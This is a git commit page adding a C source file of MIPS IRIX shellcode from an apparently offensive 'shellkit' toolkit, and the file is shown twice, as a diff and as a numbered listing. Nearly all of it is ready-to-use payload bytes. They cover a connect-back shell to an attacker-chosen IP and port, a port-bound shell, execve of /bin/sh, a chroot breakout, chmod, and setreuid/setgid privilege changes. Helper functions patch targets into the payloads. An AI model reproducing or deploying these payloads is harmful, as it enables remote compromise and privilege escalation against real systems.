initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/mips_irix.c
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
1 files changed, 231 insertions, 0 deletions
diff --git a/other/shellkit/mips_irix.c b/other/shellkit/mips_irix.c
new file mode 100644
index 0000000..33bf38c
--- /dev/null
+++ b/other/shellkit/mips_irix.c
@@ -0,0 +1,231 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "shellcode.h"
+#include "mips.h"
+/* tested on:   IP20  R4000 6.5
+ */
+shellcode       mips_irix_chmod = {
+        "mips-irix-chmod",
+        64,
+        "\x04\x10\xff\xff\x24\x05\x41\x41\x38\xa5\x55\x55"
+                                /* ^^  ^^ = uid ^ 0x5555 */
+        "\x24\x06\x42\x42\x38\xc6\x05\x55\x27\xe4\x01\x80"
+                /* ^^  ^^ = gid ^ 0x5555 */
+        "\xa0\x80\x00\x00\x24\x84\xfe\xb8\x24\x02\x03\xf8"
+                /* ^^  ^^ = length of appended pathname + 0xfeb8 */
+        "\x01\x01\x01\x0c\x24\x05\x09\xed\x24\x02\x03\xf7"
+        "\x01\x01\x01\x0c\x24\x02\x03\xe9\x01\x01\x01\x0c"
+        "\x24\x18\x72\xec",
+};
+/* tested on:   IP20  R4000 6.5
+ */
+shellcode       mips_irix_chroot = {
+        "mips-irix-chroot",
+        84,
+        "\x04\x10\xff\xff\x24\x05\x01\xc0\x3c\x0e\x59\x2e"
+        "\x35\xce\x2c\xff\x21\xce\x01\x01\xaf\xee\xff\xd0"
+        "\x27\xe4\xff\xd0\x24\x02\x04\x38\x01\x01\x01\x0c"
+        "\x24\xa2\x02\x65\x01\x01\x01\x0c\x24\x12\x12\x11"
+        "\x27\xe4\xff\xd1\x24\x02\x03\xf4\x01\x01\x01\x0c"
+        "\x22\x52\xfe\xff\x06\x41\xff\xfb\x26\x42\x04\x26"
+        "\x27\xe4\xff\xd2\x01\x01\x01\x0c\x24\x0e\x73\x50",
+};
+/* tested on:   IP20  R4000 6.5
+ */
+shellcode       mips_irix_connectsh = {
+        "mips-irix-connectsh",
+        172,
+        "\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2"
+        "\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c"
+        "\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0"
+        "\x24\x0e\x41\x41\xa7\xae\xff\xf2\x3c\x0e\x41\x42"
+                /* ^^  ^^ port */               /* ^^  ^^  ip 1.2. */
+        "\x35\xce\x43\x44\xaf\xae\xff\xf4\xaf\xa0\xff\xf8"
+                /* ^^  ^^ ip .3.4 */
+        "\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0\x03\xa6\x28\x23"
+        "\x24\x02\x04\x43\x01\x01\x01\x0c\x26\xd3\xbc\xe2"
+        "\x30\x97\xff\xff\x32\x64\x01\x03\x24\x02\x03\xee"
+        "\x01\x01\x01\x0c\x32\xe4\xff\xff\x28\x05\xff\xff"
+        "\x32\x66\x01\x03\x24\x02\x04\x26\x01\x01\x01\x0c"
+        "\x26\x73\xef\xef\x06\x61\xff\xf6\xaf\xa0\xff\xfc"
+        "\x04\x10\xff\xff\x27\xa5\xff\xf8\x27\xff\x01\x20"
+        "\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff\xaf\xa4\xff\xf8"
+        "\x24\x02\x04\x23\x01\x01\x01\x0c"
+        "\x2f\x62\x69\x6e\x2f\x73\x68\x42",     /* "/bin/sh\x42" */
+};
+/* tested on:   IP20  R4000 6.5
+ */
+shellcode       mips_irix_execvesh = {
+        "mips-irix-execvesh",
+        48,
+        "\xaf\xa0\xff\xfc\x04\x10\xff\xff\x8f\xa6\xff\xfc"
+        "\x27\xff\x01\x24\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff"
+        "\xaf\xa4\xff\xf8\x27\xa5\xff\xf8\x24\x02\x04\x23"
+        "\x01\x01\x01\x0c"
+        "\x2f\x62\x69\x6e\x2f\x73\x68\x42",     /* "/bin/sh\x42" */
+};
+shellcode       mips_irix_exit = {
+        "mips-irix-exit",
+        16,
+        "\x28\x04\xff\xff\x24\x02\x03\xe9\x01\x01\x01\x0c"
+        "\x24\x18\x73\x50",
+};
+/* tested on:   IP20  R4000 6.5
+ *              IP30 R10000 6.5.7m (thanks oxigen ;)
+ */
+shellcode       mips_irix_portshellsh = {
+        "mips-irix-portshellsh",
+        188,    /* yay! well optimized */
+        "\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2"
+        "\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c"
+        "\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0"
+        "\x24\x0e\x41\x41\xa7\xae\xff\xf2\xaf\xa0\xff\xf4"      /* 0x4141 = port */
+        "\xaf\xa0\xff\xf8\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0"
+        "\x03\xa6\x28\x23\x24\x02\x04\x42\x01\x01\x01\x0c"
+        "\x24\x02\x04\x48\x01\x01\x01\x0c\xaf\xa6\xff\xec"
+        "\x27\xa6\xff\xec\x24\x02\x04\x41\x01\x01\x01\x0c"
+        "\x26\xd3\xbc\xe2\x30\x57\xff\xff\x32\x64\x01\x03"
+        "\x24\x02\x03\xee\x01\x01\x01\x0c\x32\xe4\xff\xff"
+        "\x28\x05\xff\xff\x32\x66\x01\x03\x24\x02\x04\x26"
+        "\x01\x01\x01\x0c\x26\x73\xef\xef\x06\x61\xff\xf6"
+        "\xaf\xa0\xff\xfc\x04\x10\xff\xff\x27\xa5\xff\xf8"
+        "\x27\xff\x01\x20\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff"
+        "\xaf\xa4\xff\xf8\x24\x02\x04\x23\x01\x01\x01\x0c"
+        "\x2f\x62\x69\x6e\x2f\x73\x68\x42",     /* "/bin/sh\x42" */
+};
+/* tested on:   IP20  R4000 6.5
+ */
+shellcode       mips_irix_read = {
+        "mips-irix-read",
+        56,
+        "\x04\x10\xff\xff\x28\x04\xff\xff\x27\xff\x01\x31"
+        "\x27\xe5\xfe\xff\x24\x06\x10\x10\x24\x02\x03\xeb"
+        "\x01\x01\x01\x0c\x27\xe4\xfe\xff\x24\x05\x10\x10"
+        "\x24\x0e\xff\xfc\x01\xc0\x30\x27\x24\x02\x04\x7f"
+        "\x01\x01\x01\x0c\x24\x18\x73\x50",
+};
+shellcode       mips_irix_setgid = {
+        "mips-irix-setgid",
+        16,
+        "\x24\x04\x41\x41\x38\x84\x55\x55\x24\x02\x04\x16"      /* 0x4141 = gid ^ 0x5555 */
+        "\x01\x01\x01\x0c",
+};
+shellcode       mips_irix_setreuid = {
+        "mips-irix-setreuid",
+        24,
+        "\x24\x04\x41\x41\x24\x05\x42\x42\x38\x84\x55\x55"
+                /* ^^^^^^ ruid     ^^^^^^ euid, both xor 0x5555 */
+        "\x38\xa5\x55\x55\x24\x02\x04\x64\x01\x01\x01\x0c",
+};
+shellcode *     mips_irix_shellcodes[] = {
+        &mips_irix_chmod,
+        &mips_irix_chroot,
+        &mips_irix_connectsh,
+        &mips_irix_execvesh,
+        &mips_irix_exit,
+        &mips_irix_portshellsh,
+        &mips_irix_read,
+        &mips_irix_setgid,
+        &mips_irix_setreuid,
+        NULL,
+};
+arch    mips_irix = {
+        "mips-irix",
+        4,
+        mips_nop,
+        mips_irix_shellcodes,
+};
+/* set the uid, gid and pathname of the mips-irix-chmod code at `code'
+ * XXX: be sure to have strlen(pathname) bytes left after code
+ */
+void
+mips_irix_chmod_setup (unsigned char *code, char *pathname,
+        unsigned short int uid, unsigned short int gid)
+{
+        unsigned short int      len = 0xfeb8;
+        uid ^= 0x5555;
+        code[6] = (uid >> 8) & 0xff;
+        code[7] = uid & 0xff;
+        gid ^= 0x5555;
+        code[14] = (gid >> 8) & 0xff;
+        code[15] = gid & 0xff;
+        len += strlen (pathname);
+        code[26] = (len >> 8) & 0xff;
+        code[27] = len & 0xff;
+        memcpy (code + 64, pathname, strlen (pathname));
+        return;
+}
+/* ip and port in network byte order
+ */
+void
+mips_irix_connectsh_setup (unsigned char *code,
+        unsigned long int ip, unsigned short int port)
+{
+        code[38] = (port >> 8) & 0xff;
+        code[39] = port & 0xff;
+        code[46] = (ip >> 24) & 0xff;
+        code[47] = (ip >> 16) & 0xff;
+        code[50] = (ip >> 8) & 0xff;
+        code[51] = ip & 0xff;
+        return;
+}
+/* set the gid within the 'mips-irix-setgid' code at `code'
+ */
+void
+mips_irix_setgid_setup (unsigned char *code, unsigned short int gid)
+{
+        gid ^= 0x5555;
+        code[2] = (gid >> 8) & 0xff;
+        code[3] = gid & 0xff;
+        return;
+}
+void
+mips_irix_setreuid_setup (unsigned char *code,
+        unsigned short int ruid, unsigned short int euid)
+{
+        ruid ^= 0x5555;
+        code[2] = (ruid >> 8) & 0xff;
+        code[3] = ruid & 0xff;
+        euid ^= 0x5555;
+        code[6] = (euid >> 8) & 0xff;
+        code[7] = euid & 0xff;
+        return;
+}
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/mips_irix.c
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)

diff --git a/other/shellkit/mips_irix.c b/other/shellkit/mips_irix.c new file mode 100644 index 0000000..33bf38c --- /dev/null +++ b/other/shellkit/mips_irix.c
@@ -0,0 +1,231 @@
	1
	2	#include <stdio.h>
	3	#include <stdlib.h>
	4	#include <string.h>
	5	#include "shellcode.h"
	6	#include "mips.h"
	7
	8
	9	/* tested on: IP20 R4000 6.5
	10	*/
	11	shellcode mips_irix_chmod = {
	12	"mips-irix-chmod",
	13	64,
	14	"\x04\x10\xff\xff\x24\x05\x41\x41\x38\xa5\x55\x55"
	15	/* ^^ ^^ = uid ^ 0x5555 */
	16	"\x24\x06\x42\x42\x38\xc6\x05\x55\x27\xe4\x01\x80"
	17	/* ^^ ^^ = gid ^ 0x5555 */
	18	"\xa0\x80\x00\x00\x24\x84\xfe\xb8\x24\x02\x03\xf8"
	19	/* ^^ ^^ = length of appended pathname + 0xfeb8 */
	20	"\x01\x01\x01\x0c\x24\x05\x09\xed\x24\x02\x03\xf7"
	21	"\x01\x01\x01\x0c\x24\x02\x03\xe9\x01\x01\x01\x0c"
	22	"\x24\x18\x72\xec",
	23	};
	24
	25	/* tested on: IP20 R4000 6.5
	26	*/
	27	shellcode mips_irix_chroot = {
	28	"mips-irix-chroot",
	29	84,
	30	"\x04\x10\xff\xff\x24\x05\x01\xc0\x3c\x0e\x59\x2e"
	31	"\x35\xce\x2c\xff\x21\xce\x01\x01\xaf\xee\xff\xd0"
	32	"\x27\xe4\xff\xd0\x24\x02\x04\x38\x01\x01\x01\x0c"
	33	"\x24\xa2\x02\x65\x01\x01\x01\x0c\x24\x12\x12\x11"
	34	"\x27\xe4\xff\xd1\x24\x02\x03\xf4\x01\x01\x01\x0c"
	35	"\x22\x52\xfe\xff\x06\x41\xff\xfb\x26\x42\x04\x26"
	36	"\x27\xe4\xff\xd2\x01\x01\x01\x0c\x24\x0e\x73\x50",
	37	};
	38
	39	/* tested on: IP20 R4000 6.5
	40	*/
	41	shellcode mips_irix_connectsh = {
	42	"mips-irix-connectsh",
	43	172,
	44	"\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2"
	45	"\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c"
	46	"\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0"
	47	"\x24\x0e\x41\x41\xa7\xae\xff\xf2\x3c\x0e\x41\x42"
	48	/* ^^ ^^ port / / ^^ ^^ ip 1.2. */
	49	"\x35\xce\x43\x44\xaf\xae\xff\xf4\xaf\xa0\xff\xf8"
	50	/* ^^ ^^ ip .3.4 */
	51	"\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0\x03\xa6\x28\x23"
	52	"\x24\x02\x04\x43\x01\x01\x01\x0c\x26\xd3\xbc\xe2"
	53	"\x30\x97\xff\xff\x32\x64\x01\x03\x24\x02\x03\xee"
	54	"\x01\x01\x01\x0c\x32\xe4\xff\xff\x28\x05\xff\xff"
	55	"\x32\x66\x01\x03\x24\x02\x04\x26\x01\x01\x01\x0c"
	56	"\x26\x73\xef\xef\x06\x61\xff\xf6\xaf\xa0\xff\xfc"
	57	"\x04\x10\xff\xff\x27\xa5\xff\xf8\x27\xff\x01\x20"
	58	"\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff\xaf\xa4\xff\xf8"
	59	"\x24\x02\x04\x23\x01\x01\x01\x0c"
	60	"\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */
	61	};
	62
	63	/* tested on: IP20 R4000 6.5
	64	*/
	65	shellcode mips_irix_execvesh = {
	66	"mips-irix-execvesh",
	67	48,
	68	"\xaf\xa0\xff\xfc\x04\x10\xff\xff\x8f\xa6\xff\xfc"
	69	"\x27\xff\x01\x24\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff"
	70	"\xaf\xa4\xff\xf8\x27\xa5\xff\xf8\x24\x02\x04\x23"
	71	"\x01\x01\x01\x0c"
	72	"\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */
	73	};
	74
	75	shellcode mips_irix_exit = {
	76	"mips-irix-exit",
	77	16,
	78	"\x28\x04\xff\xff\x24\x02\x03\xe9\x01\x01\x01\x0c"
	79	"\x24\x18\x73\x50",
	80	};
	81
	82	/* tested on: IP20 R4000 6.5
	83	* IP30 R10000 6.5.7m (thanks oxigen ;)
	84	*/
	85	shellcode mips_irix_portshellsh = {
	86	"mips-irix-portshellsh",
	87	188, /* yay! well optimized */
	88	"\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2"
	89	"\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c"
	90	"\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0"
	91	"\x24\x0e\x41\x41\xa7\xae\xff\xf2\xaf\xa0\xff\xf4" /* 0x4141 = port */
	92	"\xaf\xa0\xff\xf8\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0"
	93	"\x03\xa6\x28\x23\x24\x02\x04\x42\x01\x01\x01\x0c"
	94	"\x24\x02\x04\x48\x01\x01\x01\x0c\xaf\xa6\xff\xec"
	95	"\x27\xa6\xff\xec\x24\x02\x04\x41\x01\x01\x01\x0c"
	96	"\x26\xd3\xbc\xe2\x30\x57\xff\xff\x32\x64\x01\x03"
	97	"\x24\x02\x03\xee\x01\x01\x01\x0c\x32\xe4\xff\xff"
	98	"\x28\x05\xff\xff\x32\x66\x01\x03\x24\x02\x04\x26"
	99	"\x01\x01\x01\x0c\x26\x73\xef\xef\x06\x61\xff\xf6"
	100	"\xaf\xa0\xff\xfc\x04\x10\xff\xff\x27\xa5\xff\xf8"
	101	"\x27\xff\x01\x20\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff"
	102	"\xaf\xa4\xff\xf8\x24\x02\x04\x23\x01\x01\x01\x0c"
	103	"\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */
	104	};
	105
	106	/* tested on: IP20 R4000 6.5
	107	*/
	108	shellcode mips_irix_read = {
	109	"mips-irix-read",
	110	56,
	111	"\x04\x10\xff\xff\x28\x04\xff\xff\x27\xff\x01\x31"
	112	"\x27\xe5\xfe\xff\x24\x06\x10\x10\x24\x02\x03\xeb"
	113	"\x01\x01\x01\x0c\x27\xe4\xfe\xff\x24\x05\x10\x10"
	114	"\x24\x0e\xff\xfc\x01\xc0\x30\x27\x24\x02\x04\x7f"
	115	"\x01\x01\x01\x0c\x24\x18\x73\x50",
	116	};
	117
	118	shellcode mips_irix_setgid = {
	119	"mips-irix-setgid",
	120	16,
	121	"\x24\x04\x41\x41\x38\x84\x55\x55\x24\x02\x04\x16" /* 0x4141 = gid ^ 0x5555 */
	122	"\x01\x01\x01\x0c",
	123	};
	124
	125	shellcode mips_irix_setreuid = {
	126	"mips-irix-setreuid",
	127	24,
	128	"\x24\x04\x41\x41\x24\x05\x42\x42\x38\x84\x55\x55"
	129	/* ^^^^^^ ruid ^^^^^^ euid, both xor 0x5555 */
	130	"\x38\xa5\x55\x55\x24\x02\x04\x64\x01\x01\x01\x0c",
	131	};
	132
	133
	134	shellcode * mips_irix_shellcodes[] = {
	135	&mips_irix_chmod,
	136	&mips_irix_chroot,
	137	&mips_irix_connectsh,
	138	&mips_irix_execvesh,
	139	&mips_irix_exit,
	140	&mips_irix_portshellsh,
	141	&mips_irix_read,
	142	&mips_irix_setgid,
	143	&mips_irix_setreuid,
	144	NULL,
	145	};
	146
	147
	148	arch mips_irix = {
	149	"mips-irix",
	150	4,
	151	mips_nop,
	152	mips_irix_shellcodes,
	153	};
	154
	155
	156
	157	/* set the uid, gid and pathname of the mips-irix-chmod code at `code'
	158	* XXX: be sure to have strlen(pathname) bytes left after code
	159	*/
	160	void
	161	mips_irix_chmod_setup (unsigned char code, char pathname,
	162	unsigned short int uid, unsigned short int gid)
	163	{
	164	unsigned short int len = 0xfeb8;
	165
	166	uid ^= 0x5555;
	167	code[6] = (uid >> 8) & 0xff;
	168	code[7] = uid & 0xff;
	169
	170	gid ^= 0x5555;
	171	code[14] = (gid >> 8) & 0xff;
	172	code[15] = gid & 0xff;
	173
	174	len += strlen (pathname);
	175	code[26] = (len >> 8) & 0xff;
	176	code[27] = len & 0xff;
	177
	178	memcpy (code + 64, pathname, strlen (pathname));
	179
	180	return;
	181	}
	182
	183
	184	/* ip and port in network byte order
	185	*/
	186	void
	187	mips_irix_connectsh_setup (unsigned char *code,
	188	unsigned long int ip, unsigned short int port)
	189	{
	190	code[38] = (port >> 8) & 0xff;
	191	code[39] = port & 0xff;
	192
	193	code[46] = (ip >> 24) & 0xff;
	194	code[47] = (ip >> 16) & 0xff;
	195	code[50] = (ip >> 8) & 0xff;
	196	code[51] = ip & 0xff;
	197
	198	return;
	199	}
	200
	201
	202	/* set the gid within the 'mips-irix-setgid' code at `code'
	203	*/
	204	void
	205	mips_irix_setgid_setup (unsigned char *code, unsigned short int gid)
	206	{
	207	gid ^= 0x5555;
	208
	209	code[2] = (gid >> 8) & 0xff;
	210	code[3] = gid & 0xff;
	211
	212	return;
	213	}
	214
	215
	216	void
	217	mips_irix_setreuid_setup (unsigned char *code,
	218	unsigned short int ruid, unsigned short int euid)
	219	{
	220	ruid ^= 0x5555;
	221	code[2] = (ruid >> 8) & 0xff;
	222	code[3] = ruid & 0xff;
	223
	224	euid ^= 0x5555;
	225	code[6] = (euid >> 8) & 0xff;
	226	code[7] = euid & 0xff;
	227
	228	return;
	229	}
	230
	231